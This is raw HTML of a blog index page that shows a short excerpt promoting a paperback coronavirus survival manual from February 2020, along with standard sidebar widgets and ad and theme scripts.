<article id="post-975500" class="post-975500 post type-post status-publish format-standard has-post-thumbnail hentry category-sticky tag-corona tag-manual tag-paperback tag-survival tag-virus tag-wuhan" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/get-the-wuhan-corona-virus-survival-manual-in-paperback/" rel="bookmark">Get “The Wuhan Corona Virus Survival Manual” in Paperback</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/get-the-wuhan-corona-virus-survival-manual-in-paperback/" title="10:57 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T10:57:00+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/get-the-wuhan-corona-virus-survival-manual-in-paperback/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Covid-19-cover-pin-400x400.png" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Covid-19-cover-pin-400x400.png 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Covid-19-cover-pin-150x150.png 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by Daisy Luther As the novel coronavirus that originated in Wuhan seems to be spreading across the globe, there are more questions than can be answered in an article – or &#8230; <a title="Get “The Wuhan Corona Virus Survival Manual” in Paperback" class="read-more" href="https://www.investmentwatchblog.com/get-the-wuhan-corona-virus-survival-manual-in-paperback/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/corona/" rel="tag">corona</a>, <a href="https://www.investmentwatchblog.com/tag/manual/" rel="tag">manual</a>, <a href="https://www.investmentwatchblog.com/tag/paperback/" rel="tag">paperback</a>, <a href="https://www.investmentwatchblog.com/tag/survival/" rel="tag">survival</a>, <a href="https://www.investmentwatchblog.com/tag/virus/" rel="tag">virus</a>, <a href="https://www.investmentwatchblog.com/tag/wuhan/" rel="tag">wuhan</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
		<nav id="nav-below" class="paging-navigation">
			<span class="screen-reader-text">Post navigation</span>

								<div class="nav-previous"><span class="prev" title="Previous"><a href="https://www.investmentwatchblog.com/sitemap.xml/page/2/" >Older posts</a></span></div>
				<div class="nav-links"><span aria-current='page' class='page-numbers current'>1</span>
<a class='page-numbers' href='https://www.investmentwatchblog.com/sitemap.xml/page/2/'>2</a>
<span class="page-numbers dots">&hellip;</span>
<a class='page-numbers' href='https://www.investmentwatchblog.com/sitemap.xml/page/3527/'>3,527</a>
<a class="next page-numbers" href="https://www.investmentwatchblog.com/sitemap.xml/page/2/">Next &rarr;</a></div>		</nav><!-- #nav-below -->
				</main><!-- #main -->
	</div><!-- #primary -->

	<div id="right-sidebar" itemtype="https://schema.org/WPSideBar" itemscope="itemscope" class="widget-area grid-25 tablet-grid-25 grid-parent sidebar">
	<div class="inside-right-sidebar">
		<aside id="custom_html-17" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><!-- Site: InvestmentWatchBlog.InvestmentWatchBlog, Zone: economics, Size 300x250, Multiple sizes: Yes -->
<script src='//ads.investingchannel.com/adtags/investmentwatchblog/economics/300x250.js' type='text/javascript' charset='utf-8'></script>


</div></aside><aside id="custom_html-11" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><!-- Begin Mailchimp Signup Form -->
<link href="//cdn-images.mailchimp.com/embedcode/classic-10_7.css" rel="stylesheet" type="text/css">
<style type="text/css">
	#mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif;  width:300px;}
	/* Add your own Mailchimp form style overrides in your site stylesheet or in this style block.
	   We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */
</style>
<div id="mc_embed_signup">
<form action="https://investmentwatchblog.us12.list-manage.com/subscribe/post?u=b23beecbe6af6dce5dfd43483&amp;id=6af0db0d33" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
<div id="mc_embed_signup_scroll">
	<h2>Subscribe to our mailing list!</h2>
<div class="indicates-required"><span class="asterisk">*</span> indicates required</div>
<div class="mc-field-group">
	<label for="mce-EMAIL">Email Address  <span class="asterisk">*</span>
</label>
	<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL">
</div>
<p><a href="https://us12.campaign-archive.com/home/?u=b23beecbe6af6dce5dfd43483&id=6af0db0d33" title="View previous campaigns">View previous campaigns.</a></p>
	<div id="mce-responses" class="clear">
		<div class="response" id="mce-error-response" style="display:none"></div>
		<div class="response" id="mce-success-response" style="display:none"></div>
	</div>    <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_b23beecbe6af6dce5dfd43483_6af0db0d33" tabindex="-1" value=""></div>
<div class="clear"><input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button"></div>
</div>
</form>
</div>

<!--End mc_embed_signup-->

<h3>
Don't have time to read every single post on IWB? Receive a daily list of must-read stories.
</h3></div></aside><aside id="wpsr_main_widget-2" class="widget inner-padding widget_wpsr_main_widget"><p>Follow Us</p><div class="socializer sr-followbar sr-32px sr-opacity sr-pad sr-multiline"><span class="sr-twitter "><a rel="nofollow" href="https://twitter.com/InvestWatchBlog" target="_blank" title="Twitter" style="color: #ffffff" ><i class="fa fa-twitter"></i></a></span><span class="sr-facebook "><a rel="nofollow" href="https://www.facebook.com/Investment-Watch-109050900614858/?modal=admin_todo_tour" target="_blank" title="Facebook" style="color: #ffffff" ><i class="fa fa-facebook-f"></i></a></span><span class="sr-email "><a rel="nofollow" href="http://eepurl.com/cvf32n" target="_blank" title="Email" style="color: #ffffff" ><i class="fa fa-envelope"></i></a></span><span class="sr-rss "><a rel="nofollow" href="https://www.investmentwatchblog.com/feed/" target="_blank" title="RSS" style="color: #ffffff" ><i class="fa fa-rss"></i></a></span></div></aside><aside id="custom_html-15" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><a href="https://www.whatfinger.com/">Whatfinger News</a></div></aside><aside id="custom_html-9" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><!-- Site: InvestmentWatchBlog.InvestmentWatchBlog, Zone: economics, Size 300x250, Multiple sizes: Yes -->
<script src='//ads.investingchannel.com/adtags/investmentwatchblog/economics/300x250.js' type='text/javascript' charset='utf-8'></script>


</div></aside><aside id="text-5" class="widget inner-padding widget_text">			<div class="textwidget"><p>As long as you keep liking, sharing, commenting, clicking on our articles, <a href="http://eepurl.com/cvf32n">subscribing</a> to our newsletter and tell your friends about IWB, we’ll keep standing up, speaking out and fighting back!</p>
<p><a href="https://feedly.com/i/subscription/feed%2Fhttp%3A%2F%2Finvestmentwatchblog.com%2Ffeed" target="blank"><img id="feedlyFollow" src="https://s3.feedly.com/img/follows/feedly-follow-rectangle-volume-big_2x.png" alt="follow us in feedly" width="131" height="56" /></a></p>
</div>
		</aside><aside id="custom_html-18" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><!-- Site: InvestmentWatchBlog.InvestmentWatchBlog, Zone: economics, Size 300x384, Multiple sizes: N/A -->
<script src='//ads.investingchannel.com/adtags/investmentwatchblog/economics/300x384.js?pc=pc&' type='text/javascript' charset='utf-8'></script>
</div></aside>		<aside id="recent-posts-2" class="widget inner-padding widget_recent_entries">		<h2 class="widget-title">Recent Posts</h2>		<ul>
											<li>
					<a href="https://www.investmentwatchblog.com/negative-interest-rates-are-fatal-ultimately-to-your-banking-system-jeff-gundlach/">&#8220;Negative interest rates are fatal, ultimately, to your banking system.&#8221; &#8211; Jeff Gundlach</a>
									</li>
											<li>
					<a href="https://www.investmentwatchblog.com/good-news-is-japan-reported-its-fourth-worst-economic-contraction-going-back-to-the-1990s-bad-news-is-that-was-before-the-virus-outbreak/">Good news is Japan reported its fourth-worst economic contraction going back to the 1990s.  Bad news is that was before the virus outbreak</a>
									</li>
											<li>
					<a href="https://www.investmentwatchblog.com/the-fed-has-created-a-monster-bubble-it-can-no-longer-control/">The Fed Has Created a Monster Bubble It Can No Longer Control</a>
									</li>
											<li>
					<a href="https://www.investmentwatchblog.com/the-wolf-street-report-coronavirus-slams-airbnb-airlines-hotels-casinos-san-francisco-other-hot-spots/">THE WOLF STREET REPORT: Coronavirus Slams Airbnb, Airlines, Hotels, Casinos, San Francisco, Other Hot Spots</a>
									</li>
											<li>
					<a href="https://www.investmentwatchblog.com/robot-waiters-robot-cooks-coming-to-vegas/">ROBOT Waiters &#038; ROBOT Cooks Coming to Vegas</a>
									</li>
					</ul>
		</aside><aside id="search-2" class="widget inner-padding widget_search"><form method="get" class="search-form" action="https://www.investmentwatchblog.com/">
	<label>
		<span class="screen-reader-text">Search for:</span>
		<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:">
	</label>
	<input type="submit" class="search-submit" value="Search">
</form>
</aside><aside id="custom_html-3" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><script src='//ads.investingchannel.com/cp/investmentwatchblog/54/750.js' type='text/javascript' charset='utf-8'></script></div></aside><aside id="custom_html-22" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget">If you’re running an ad-blocker it’s costing me money. Our website relies on internet advertisements to pay the bills. If you don’t mind turning off your ad-blocker and giving it a try without, I’d appreciate it.</div></aside><aside id="custom_html-14" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget">Privacy &amp; Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, see here: <a href="https://www.investmentwatchblog.com/privacy-policy/">Cookie Policy</a></div></aside><aside id="custom_html-23" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"><script src='//ads.investingchannel.com/cp/investmentwatchblog/54/750.js' type='text/javascript' charset='utf-8'></script></div></aside>	</div><!-- .inside-right-sidebar -->
</div><!-- #secondary -->

	</div><!-- #content -->
</div><!-- #page -->


<div class="site-footer grid-container grid-parent footer-bar-active footer-bar-align-right">
			<footer class="site-info" itemtype="https://schema.org/WPFooter" itemscope="itemscope">
			<div class="inside-site-info grid-container grid-parent">
						<div class="footer-bar">
			<aside id="text-6" class="widget inner-padding widget_text">			<div class="textwidget"><p>InvestmentWatchBlog.com © 2018. All Rights Reserved.</p>
</div>
		</aside>		</div>
						<div class="copyright-bar">
					<span class="copyright">&copy; 2020</span> &bull; <a href="https://generatepress.com" target="_blank" itemprop="url">GeneratePress</a>				</div>
			</div>
		</footer><!-- .site-info -->
		</div><!-- .site-footer -->

<a title="Scroll back to top" rel="nofollow" href="#" class="generate-back-to-top" style="opacity:0;visibility:hidden;" data-scroll-speed="400" data-start-scroll="300">
				<span class="screen-reader-text">Scroll back to top</span>
			</a><script>
		var advanced_ads_ga_UID = '';
		var advanced_ads_ga_anonymIP = true;
advanced_ads_check_adblocker=function(t){function e(t){(window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||function(t){return setTimeout(t,16)}).call(window,t)}var n=[],a=null;return e(function(){var t=document.createElement("div");t.innerHTML="&nbsp;",t.setAttribute("class","ad_unit ad-unit text-ad text_ad pub_300x250"),t.setAttribute("style","width: 1px !important; height: 1px !important; position: absolute !important; left: 0px !important; top: 0px !important; overflow: hidden !important;"),document.body.appendChild(t),e(function(){var e=window.getComputedStyle&&window.getComputedStyle(t),o=e&&e.getPropertyValue("-moz-binding");a=e&&"none"===e.getPropertyValue("display")||"string"==typeof o&&-1!==o.indexOf("about:");for(var i=0;i<n.length;i++)n[i](a);n=[]})}),function(t){if(null===a)return void n.push(t);t(a)}}(),function(){var t=function(t,e){this.name=t,this.UID=e,this.analyticsObject=null;var n=this,a={hitType:"event",eventCategory:"Advanced Ads",eventAction:"AdBlock",eventLabel:"Yes",nonInteraction:!0,transport:"beacon"};this.analyticsObject="string"==typeof GoogleAnalyticsObject&&"function"==typeof window[GoogleAnalyticsObject]&&window[GoogleAnalyticsObject],!1===this.analyticsObject?(!function(t,e,n,a,o,i,d){t.GoogleAnalyticsObject=o,t[o]=t[o]||function(){(t[o].q=t[o].q||[]).push(arguments)},t[o].l=1*new Date,i=e.createElement(n),d=e.getElementsByTagName(n)[0],i.async=1,i.src="https://www.google-analytics.com/analytics.js",d.parentNode.insertBefore(i,d)}(window,document,"script",0,"_advads_ga"),_advads_ga("create",n.UID,"auto",this.name),advanced_ads_ga_anonymIP&&_advads_ga("set","anonymizeIp",!0),_advads_ga(n.name+".send",a)):(window.console&&window.console.log("Advanced Ads Analytics >> using other's variable named `"+GoogleAnalyticsObject+"`"),window[GoogleAnalyticsObject]("create",n.UID,"auto",this.name),window[GoogleAnalyticsObject]("set","anonymizeIp",!0),window[GoogleAnalyticsObject](n.name+".send",a))};advanced_ads_check_adblocker(function(e){e&&"string"==typeof advanced_ads_ga_UID&&advanced_ads_ga_UID&&new t("advadsTracker",advanced_ads_ga_UID)})}();		
		</script>
<!-- WP Socializer 4.1.9 - JS - Start -->
<script>var wpsr_ajax_url = "https://www.investmentwatchblog.com/wp-admin/admin-ajax.php";</script>
<!-- WP Socializer - JS - End -->
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/gp-premium/menu-plus/functions/js/sticky.min.js?ver=1.6.2'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/advanced-ads-layer/public/assets/js/layer.js?ver=1.6.2'></script>
<!--[if lte IE 11]>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/themes/generatepress/js/classList.min.js?ver=2.1.2'></script>
<![endif]-->
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/themes/generatepress/js/menu.min.js?ver=2.1.2'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/themes/generatepress/js/a11y.min.js?ver=2.1.2'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/themes/generatepress/js/navigation-search.min.js?ver=2.1.2'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/themes/generatepress/js/back-to-top.min.js?ver=2.1.2'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/wp-socializer/public/js/wp-socializer.min.js?ver=4.1.9'></script>

</body>
</html>
